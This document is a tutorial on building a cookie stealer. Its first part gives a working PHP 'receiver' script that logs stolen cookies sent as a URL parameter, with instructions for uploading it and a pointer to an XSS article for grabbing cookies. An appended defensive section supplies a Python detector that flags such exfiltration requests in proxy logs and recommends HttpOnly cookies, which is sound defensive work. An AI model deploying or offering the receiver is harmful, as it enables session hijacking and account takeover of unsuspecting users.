Hi friends, let's look at exactly how a cookie stealer works. There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essence, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.
PHP Coding a receiver is the part. Only two things are needed to make a receiver: a web host/FTP which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said, the receiver's job is to receive the cookie from the sender. Once the receiver has the cookie, it needs a way to get that cookie to you.
<?php // line 1
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?>
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 opens the file "cookielog.txt" for writing in append mode ('a'), so new entries are added to the end of the file, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.
Done! Just upload the files to the FTP server and set the permissions of the text file "cookielog.txt" to 777. How to grab cookies is explained in the next article, "Complete tutorial on Cross Site Scripting / XSS Hacking!"
Thank you for reading this article.
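Seen from the defender's side, the "stealer.php?cookie=x" request described above leaves a trace in outbound proxy logs: a query parameter whose decoded value is a cookie string. The following is an added example, not code from the original article, that flags such requests; the log format, host names and session cookie names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: session cookie names used by the applications being protected.
SESSION_COOKIE_NAMES = {"PHPSESSID", "JSESSIONID", "sessionid"}
# A decoded document.cookie string with 2+ cookies: "name=value; name2=value2".
COOKIE_STRING = re.compile(r"^\s*[\w.-]+=[^;]*(;\s*[\w.-]+=[^;]*)+;?\s*$")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP')

# Constructed sample lines (proxy log with absolute URLs), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET http://shop.example/cart?id=42 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET http://files.example.net/stealer.php'
    '?cookie=PHPSESSID%3Dabc123def456%3B%20theme%3Ddark HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET http://cdn.example.org/lib.js?v=1.2.3 HTTP/1.1" 200 9000',
    '10.0.0.8 - - [01/Jan/2024:10:00:09 +0000] "GET http://img.example.net/p.gif'
    '?d=uid%3D1001%3B%20token%3D9f8e7d6c5b HTTP/1.1" 200 43',
]

def cookie_like(value):
    """Return why a decoded query value resembles cookie data, or None."""
    names = {p.split("=", 1)[0].strip() for p in value.split(";") if "=" in p}
    hit = names & SESSION_COOKIE_NAMES
    if hit:
        return "session cookie name: " + ", ".join(sorted(hit))
    if COOKIE_STRING.match(value):
        return "cookie-shaped name=value list"
    return None

def suspicious_requests(log_lines, own_hosts):
    """Return (line_no, host, param, reason) for requests to hosts outside
    own_hosts whose query string carries cookie-like data."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a request line in the assumed format
        url = urlsplit(m.group(1))
        if url.hostname is None or url.hostname in own_hosts:
            continue  # cookies sent to our own hosts are expected
        # parse_qsl percent-decodes values, so "%3D" and "%3B" become "=" and ";"
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            reason = cookie_like(value)
            if reason:
                findings.append((line_no, url.hostname, param, reason))
    return findings

if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG, {"shop.example"}):
        print(finding)
```

Setting the HttpOnly flag on session cookies keeps them out of document.cookie in the first place, so this check is a second layer rather than the primary control.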